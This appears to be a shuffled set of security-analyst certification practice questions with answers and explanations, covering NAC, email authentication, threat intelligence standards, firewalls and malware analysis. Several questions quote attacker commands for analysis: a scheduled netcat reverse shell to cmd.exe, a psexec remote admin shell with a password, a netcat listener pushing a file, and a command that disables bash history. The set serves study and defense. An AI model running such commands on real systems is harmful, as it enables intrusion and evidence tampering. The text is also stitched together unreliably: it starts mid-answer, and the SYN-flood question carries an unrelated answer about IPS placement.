C. API-based integrations allow a SOAR environment to send queries as required for the data they need. Flat files and CSVs can be useful when there is no API, or when there isn't support for the API in an environment, and real-time integration is not required. Email integrations can result in delays as email delivery is not done at a guaranteed speed and can require additional parsing and processing to extract information. Although it isn't in the list here, Bruce might consider a direct database connection if he was unable to use an API and wanted real-time data.
85. Damian has discovered that systems throughout his organization have been compromised for over a year by an attacker with significant resources and technology. After a month of attempting to fully remove the intrusion, his organization is still finding signs of compromise despite their best efforts. How would Damian best categorize this threat actor? A. Criminal B. Hacktivist C. APT D. Unknown
C. Damian has likely encountered an advanced persistent threat (APT). They are characterized as extremely well-resourced actors whose compromises typically have an extended dwell time and the ability to scale capabilities to counter defenders over time.
91. Ric is working on reverse-engineering a malware sample and wants to run the binary but also control the execution as it occurs. What type of tool should he select for this? A. A disassembler B. A decompiler C. A debugger D. An unpacker
C. Debuggers allow you to control the execution of a program by setting breakpoints, changing input data and variables, and otherwise controlling the execution of the program. Disassemblers and decompilers can provide insight into the code of a binary (either assembly code or reconstructed source code), whereas an unpacker helps remove compression or encryption used to help obfuscate the code itself.
75. What does EDR use to capture data for analysis and storage in a central database? A. A network tap B. Network flows C. Software agents D. Hardware agents
C. Endpoint detection and response (EDR) tools use software agents to monitor endpoint systems and to collect data about processes, user and system activity, and network traffic, which is then sent to a central processing, analysis, and storage system.
18. While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in a Windows console window. What has occurred?
psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe
A. The user has opened a command prompt on their workstation. B. The user has opened a command prompt on the desktop of a remote workstation. C. The user has opened an interactive command prompt as administrator on a remote workstation. D. The user has opened a command prompt on their workstation as Administrator.
C. Even if you're not familiar with the PS tools, you can use your knowledge of Windows command line tools to figure out what is happening here. We see a remote workstation (it is highly unlikely you would connect to your own workstation this way!) indicated by the \\ip.address, a -u flag likely to mean userID with Administrator listed, and a -p for password. We know that cmd.exe is the Windows command prompt, so it is reasonable and correct to assume that this will open a remote command prompt for interactive use. If this is a user who isn't an administrator, Charlene needs to start an incident investigation right away.
97. Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Change sshd_config to deny root login D. Add a network IPS rule to block root logins
C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Singh's goal.
42. Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements? A. Whitelisting B. Port Security C. NAC D. EAP
C. NAC (Network Access Control) can combine user or system authentication with client-based or clientless configuration and profiling capabilities to ensure that systems are properly patched, configured, and in a desired security state. Whitelisting is used to allow specific systems or applications to work, port security is a MAC address filtering capability, and Extensible Authentication Protocol (EAP) is an authentication protocol.
44. While analyzing a malware file that she discovered, Tracy finds an encoded file that she believes is the primary binary in the malware package. Which of the following is not a type of tool that the malware writers may have used to obfuscate the code? A. A packer B. A crypter C. A shuffler D. A protector
C. Packers, or runtime packers, are tools that self-extract when run, making the code harder to reverse-engineer. Crypters may use actual encryption or simply obfuscate the code, making it harder to interpret or read. Protectors are software that is intended to prevent reverse engineering and often include packing and encryption techniques as well as other protective technologies. Shufflers were made up for this question.
14. Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model? A. 802.1x B. DMARC C. SPF D. 802.3
A. Isaac should recommend 802.1x, the standard for port-based network access control. Both DMARC and SPF are email security standards, and 802.3 is the specification for Ethernet, but it isn't a security standard.
65. Eric wants to send an email using a digital signature to ensure that the recipient can prove that the email was sent by him and that the content has not changed. What technology is frequently used for this? A. S/MIME B. IMAP C. DKIM D. TLS
A. Secure/Multipurpose Internet Mail Extensions (S/MIME) is a standard for encryption and signing that has been implemented for many email platforms. If his email client and the recipient's email client both support it, Eric can digitally sign his email to prove that he sent it and that the content has not been changed.
19. Brian writes a Snort rule that reads Alert tcp any -> 10.10.11.0/24 3306 What type of traffic will he detect? A. MySQL traffic B. RDP traffic C. LDAP traffic D. BGP traffic
A. TCP port 3306 is a common service port for MySQL. If you are asked to review rules for an IPS, IDS, firewall, or other service and do not know the rule syntax, look for what you do know. Here you can tell direction -> and that the alert would look for traffic from any system on any port to systems in the 10.10.11.0/24 network range on port 3306.
39. Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources? A. STIX and TAXII B. SAML and OCSP C. STIX and CAB D. SAML and TAXII
A. The Structured Threat Information Expression language (STIX), and TAXII, the protocol used to transfer threat intelligence, are open protocols that have been adopted to allow multiple threat sources to be combined effectively. SAML is Security Assertion Markup Language, OCSP is Online Certificate Status Protocol, and CAB was made up for this question.
98. Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command.
at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. B. It uses the AT command to dial a remote host via NetBIOS. C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
A. The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Azra should be concerned, as this allows traffic in that otherwise might be blocked.
31. The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The source port is not specified. D. There is no error in the rule, and Chris should check for other issues.
B. Chris can correct this error by switching the positions of rules 2 and 3. Rule 3, which permits access from the 10.20.0.0/16 subnet, will never be triggered because any traffic from that subnet also matches rule 2, which blocks it.
74. While reviewing output from the netstat command, John sees the following output. What should his next action be?
[minesweeper.exe] TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe] TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
A. Capture traffic to 151.101.2.69 using Wireshark B. Initiate the organization's incident response plan C. Check to see if 151.101.2.69 is a valid Microsoft address D. Ignore it; this is a false positive.
B. John has discovered a program that is both accepting connections and has an open connection, neither of which is typical for the Minesweeper game. Attackers often disguise trojans as innocuous applications, so John should follow his organization's incident response plan.
33. Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested? A. Install host firewalls on the systems B. Move to a NAT environment C. Install an IPS D. None of the above
B. Moving to a NAT environment will make the systems inaccessible from the outside world, massively reducing the organization's attack surface. Installing host firewalls would be a great second step, but could involve significant amounts of work to install and tune the firewalls.
6. What does execution of wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation? A. A scripted application installation B. Remote execution of code C. A scripted application uninstallation D. A zero-day attack
B. PowerShell, wmic, and winrm.vbs are all commonly used for remote execution of code or scripts, and finding them in use on a typical workstation should cause you to be worried as most users will never use any of the three.
22. While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening? A. A firewall is blocking connections from occurring B. An IPS is blocking connections from occurring C. A SYN flood D. An ACK blockage
B. Sadiq should place his IPS at point B. The firewall will filter out large amounts of unnecessary traffic, reducing the load on the IPS, and the IPS will see the largest amount of untrusted traffic at this location without de-aligning with the increased load that it would face outside the firewall.
102. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: nc -l -p 43501 < example.zip What happened? A. The user set up a reverse shell running as example.zip. B. The user set up netcat as a listener to push example.zip. C. The user set up a remote shell running as example.zip. D. The user set up netcat to receive example.zip.
B. The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.
2. Isaac wants to monitor live memory usage on a Windows system. What tool should he use to see memory usage in a graphical user interface? A. MemCheck B. Performance Monitor C. WinMem D. top
B. The Windows Performance Monitor provides a live view of memory usage per running application or service. This can be useful for live memory analysis. MemCheck and WinMem were made up for this question, and top is a useful Linux tool for checking memory utilization. If you aren't familiar with tools like this, you may want to spend some time with Windows and Linux common command cheat sheets like the Linux sheet found at www.linuxtrainingacademy.com/linux-commands-cheat-sheet/.
40. Cassandra is documenting a threat actor using the STIX 2.0 standard, and she describes the threat actor as wanting to steal nuclear research data. What type of label would this receive in the STIX taxonomy? A. An alias B. A goal C. Their sophistication D. Their resource level
B. The thing that a threat actor wants to do is a goal in the STIX 2.0 taxonomy. Since you're unlikely to have memorized the taxonomy, when you encounter a question like this you should rule out what you can. Most questions will have one or more obviously incorrect answers—here that's likely their resource level and their alias. If you only ruled those two out, you'd have a 50 percent chance of getting a question like this right. In this case, you can likely then guess that wanting to steal nuclear research data is a goal and move on with the next question.
20. What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators? A. An IPS B. UEBA C. An IDS D. DMARC
B. User and event or entity behavior analytics (UEBA) captures data about entities and events as well as other security data and performs statistical and other analyses to detect abnormal and unexpected behavior, then alerts administrators so that they can review the information and take appropriate action.
4. The automated malware analysis tool that Jose is using uses a disassembler and performs binary diffing across multiple malware binaries. What information is the tool looking for? A. Calculating minimum viable signature length B. Binary fingerprinting to identify the malware author C. Building a similarity graph of similar functions across binaries D. Heuristic code analysis of development techniques
C. Binary diffing looks at multiple potentially related binaries that have anti-reverse-engineering tools run on them and looks for similarities. Graphs map this data, helping the tool identify malware families despite the protections that malware authors bake in. As you might have guessed, the rest of the answers for this question were made up.
24. Charles wants to use his SIEM to automatically flag known bad IP addresses. Which of the following capabilities is not typically used for this with SIEM devices? A. Blacklisting B. IP reputation C. Whitelisting D. Domain reputation
C. Blacklisting known bad IP addresses, as well as the use of both domain and IP reputation services, can help Charles accomplish his task. Whitelisting only allows known addresses through and does not flag known bad addresses.
54. Maria is an Active Directory domain administrator for her company, and she knows that a quickly spreading botnet relies on a series of domain names for command and control, and that preventing access to those domain names will cause the malware infection that connects to the botnet to fail to take further action. Which of the following actions is her best option if she wants to prevent off-site Windows users from connecting to botnet command and control systems? A. Force a BGP update B. Set up a DNS sinkhole C. Modify the hosts file D. Install an antimalware application
C. Maria can push an updated hosts file to her domain-connected systems that will direct traffic intended for known bad domains to the localhost or a safe system. She might want to work with a security analyst or other IT staff member to capture queries sent to that system to track any potentially infected workstations. A DNS sinkhole would only work if all of the systems were using local DNS, and offsite users are likely to have DNS settings set by the local networks they connect to. Antimalware applications may not have an update yet, or may fail to detect the malware, and forcing a BGP update for third-party networks is likely a bad idea.
16. When Pete connects to his organization's network, his PC runs the NAC software his systems administrator installed. The software communicates to the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using? A. Agent-based, in-band B. Agentless, in-band C. Agent-based, out-of-band D. Agentless, out-of-band
C. Pete's organization is using an agent-based, out-of-band NAC solution that relies on a locally installed agent to communicate to existing network infrastructure devices about the security state of his system. If Pete's organization used dedicated appliances, it would be an in-band solution, and of course not having an agent installed would make it agentless.
12. Suki notices inbound traffic to a Windows system on TCP port 3389 on her corporate network. What type of traffic is she most likely seeing? A. A NetBIOS file share B. A RADIUS connection C. An RDP connection D. A Kerberos connection
C. RDP operates over TCP 3389. Most corporate workstations won't have RDP turned on inbound to workstations, and Suki may find that she has discovered a compromise or other behavior that her organization may not want to occur.
37. Matt believes that developers in his organization deployed code that did not implement cookies in a secure way. What type of attack would be aided by this security issue? A. SQL injection B. A denial-of-service attack C. Session hijacking D. XSS
C. Session hijacking of insecurely implemented session cookies is the likely result from this type of issue. Matt should spend time with his developers to ensure that they have reviewed resources like the OWASP guides to secure session creation and maintenance.
41. Jamal wants to leverage a framework to improve his threat hunting for network defense. What threat hunting framework should he select to help his team categorize and analyze threats more effectively? A. MOPAR B. CVSS C. MITRE ATT&CK D. CAPEC
C. The ATT&CK framework is focused on network defense and broadly covers threat hunting. CAPEC is focused on application security. CVSS is the Common Vulnerability Scoring System, and Mopar is a parts, service, and customer care organization that is part of Fiat Chrysler.
93. Juliette wants to decrease the risk of embedded links in email. Which of the following solutions is the most common method for doing this? A. Removing all links in email B. Redirecting links in email to a proxy C. Scanning all email using an antimalware tool D. Using a DNS blackhole and IP reputation list
C. The most common solution to identifying malicious embedded links in email is to use an antimalware software package to scan all emails. They typically include tools that combine IP and domain reputation lists as well as other heuristic and analytical tools to help identify malicious and unwanted links.
76. While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: ln /dev/null ~/.bash_history What action was this user attempting to perform? A. Enabling the Bash history B. Appending the contents of /dev/null to the Bash history C. Logging all shell commands to /dev/null D. Allowing remote access from the null shell
C. This command will prevent commands entered at the Bash shell prompt from being logged, as they are all sent to /dev/null. This type of action is one reason that administrative accounts are often logged to remote hosts, preventing malicious insiders or attackers who gain administrative access from hiding their tracks.
35. Manish is using a NAC system and wants to allow users who do not meet admission requirements to patch their machines. What technique should he use to allow this? A. Deny access to the network and require users to connect to a different network to patch before they reconnect B. Build a quarantine network that allows access to update sites and tools C. Deny all access and contact tech support to patch the system D. Allow access and force a reboot after patching
B. Both quarantine networks and captive portals with patch tools and instructions are common solutions to this type of requirement. In this case, placing systems into an isolated quarantine network with access to update and patching sites will meet Manish's needs.
72. Piper wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. # iptables --policy INPUT DROP B. # iptables --policy SERVICE DROP C. # iptables --policy OUTPUT DROP D. # iptables --policy FORWARD DROP
B. By default, an iptables firewall will have INPUT, OUTPUT, and FORWARD chains (there is no SERVICE chain). Piper should set the default policy to DROP on all three chains to stop all traffic to or from the machine.
63. Latisha wants to ensure that BYOD workstations that connect to her network meet specific minimum operating system patch level requirements. She also wants to place them into the correct VLAN for the user group that the logged-in user belongs to. She is deploying her solution to an existing, complex network. What solution should she recommend? A. Agent-based, in-line NAC B. Agentless, in-line NAC C. Agent-based, out-of-band NAC D. Agentless, out-of-band NAC
D. The key requirements here are that this is an existing network and that the systems are BYOD. That means that Latisha should focus on an agentless system to remove the hurdles that agent-based scanning requires and that an out-of-band solution is likely appropriate since they are easier to retrofit to an existing network than an in-line solution, which can require rearchitecting a network to place the in-line NAC device into a central control location. It is important to note that Latisha will likely have less visibility than she would have with an agent-based system.
28. Fiona wants to prevent email impersonation of individuals inside her company. What technology can help prevent this? A. IMAP B. SPF C. DKIM D. DMARC
D. While SPF and DKIM can help, DMARC combines them, limiting trusted senders to a known list and proving that the sending domain is the domain it claims to be, to prevent email impersonation when other organizations also use DMARC.